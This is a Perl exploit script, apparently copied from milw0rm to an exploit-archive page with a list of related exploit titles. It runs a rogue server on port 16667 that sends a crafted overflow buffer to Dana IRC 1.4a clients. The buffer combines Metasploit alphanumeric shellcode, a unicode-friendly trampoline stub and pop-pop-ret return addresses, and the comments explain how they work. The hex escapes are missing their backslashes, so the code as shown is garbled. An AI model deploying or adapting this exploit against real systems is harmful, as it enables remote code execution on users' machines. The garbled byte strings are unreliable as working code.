#!/usr/bin/perl

# k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.

# I was looking for a vuln to write an exploit for when I found this PoC:

#

# http://www.milw0rm.com/exploits/5817

#

# The author wrote:

# "The reason why there isnt any shellcode here is because the client is

# coverting the junk/buffer data to unicode so its corrupting the shellcode,

# ive tried sending unicode buffer but the same problem occurs.

# if anyone else can get further please let me know. but i doubt you can"

#

# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)

# that i decided to write this. Actually it was pretty funny :)

#

# The first problem is how to redirect the execution flow to our buffer, the buffer can be found

# at three different locations:

# - at some address on the stack converted to unicode

# - at some address on the heap again converted to unicode

# - at some address on the heap in plain ASCII

#

# Unfortunately none of these addresses are unicode friendly :(.

# But.. there is an address on the stack that points in the middle of the buffer(the one on the

# stack), all we need is to pop the stack 6 times and then return.

# To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.

#

# The second problem is that the buffer on the stack is converted to unicode(so x41 -> x00x41)

# *and* must be, with some exceptions, in the x01 -> x59 space... so I decided to write a

# unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX

# using offsets from a register(somewhat related to our buffer), push it and then return.

#

# On my box this works 100 times out of 100 :) use warnings;

use strict;

use IO::Socket; my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 ); my $ret = "xa2x41" ; # pop, pop, pop, ret # metasploit shellcode

my $shellcode =

"x50x59x49x49x49x49x49x49x49x49x49x49x51x5a" .

"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .

"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .

"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .

"x4ax4ax49x4bx4cx4bx58x50x44x45x50x45x50x45" .

"x50x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x44" .

"x38x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4bx51" .

"x4fx47x50x43x31x4ax4bx47x39x4cx4bx50x34x4c" .

"x4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4b" .

"x34x49x50x42x54x44x47x49x51x48x4ax44x4dx43" .

"x31x49x52x4ax4bx4cx34x47x4bx46x34x46x44x44" .

"x44x43x45x4ax45x4cx4bx51x4fx51x34x43x31x4a" .

"x4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4fx45" .

"x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51x4a" .

"x4bx4dx59x51x4cx47x54x44x44x48x43x51x4fx50" .

"x31x4cx36x45x30x50x56x42x44x4cx4bx47x36x46" .

"x50x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4e" .

"x4dx4cx4bx43x58x45x58x4cx49x4cx38x4bx33x49" .

"x50x43x5ax46x30x45x38x4cx30x4dx5ax44x44x51" .

"x4fx42x48x4cx58x4bx4ex4cx4ax44x4ex51x47x4b" .

"x4fx4ax47x47x33x47x4ax51x4cx50x57x50x49x50" .

"x4ex50x44x50x4fx46x37x46x33x51x4cx42x53x42" .

"x59x44x33x44x34x43x55x42x4dx47x43x50x32x51" .

"x4cx43x53x45x31x42x4cx45x33x46x4ex45x35x42" .

"x58x45x35x43x30x45x5ax41x41";

# Black magic unicode friendly ASM stub that will load the shellcode address

# using offsets from a register that points near the shellcode.

my $trampoline = "x52" . # push edx

"x42" .

"x58" . # pop eax

"x42" .

"x55" . # push ebp

"x42" .

"x44" . # inc esp

"x42" .

"x44" . # inc esp

"x42" .

"x59" . # pop ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x51" . # push ecx

"x42" .

"x4c" . # dec esp

"x42" .

"x59" . # pop ecx

"xec" . # add ah,ch

"x42" .

"x50" . # push eax

"x42" .

"x5e" . # pop esi

"x42" .

"x51" . # push ecx

"x42" .

"x44" . # inc esp

"x42" .

"x58" . # pop eax

"x42" .

"x54" . # push esp

"x42" .

"x5b" . # pop ebx

"x42" .

"x56" . # push esi

"x42" .

"x4B" . # dec ebx

"x42" .

"x4B" . # dec ebx

"x42" .

"x4b" . # dec ebx

"x42" .

"x4b" . # dec ebx

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x42" .

"x58" . # pop eax

"x42" .

"x44" . # inc esp // realign stack pointer

"x42" .

"x44" . # inc esp // realign stack pointer

"x42" .

"x50" . # push eax

"x42" .

"xc3" ; # ret my $buf2 = $shellcode .

"x41" x (784-length($shellcode)) .

$trampoline .

"x62" x 158 .

$ret .

"x41" x 6 .

$ret; while(my $client = $sock->accept()) {

print $client "$buf2rn";

}

【Dana IRC 1.4a Remote Buffer Overflow Exploit】相关文章：

★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit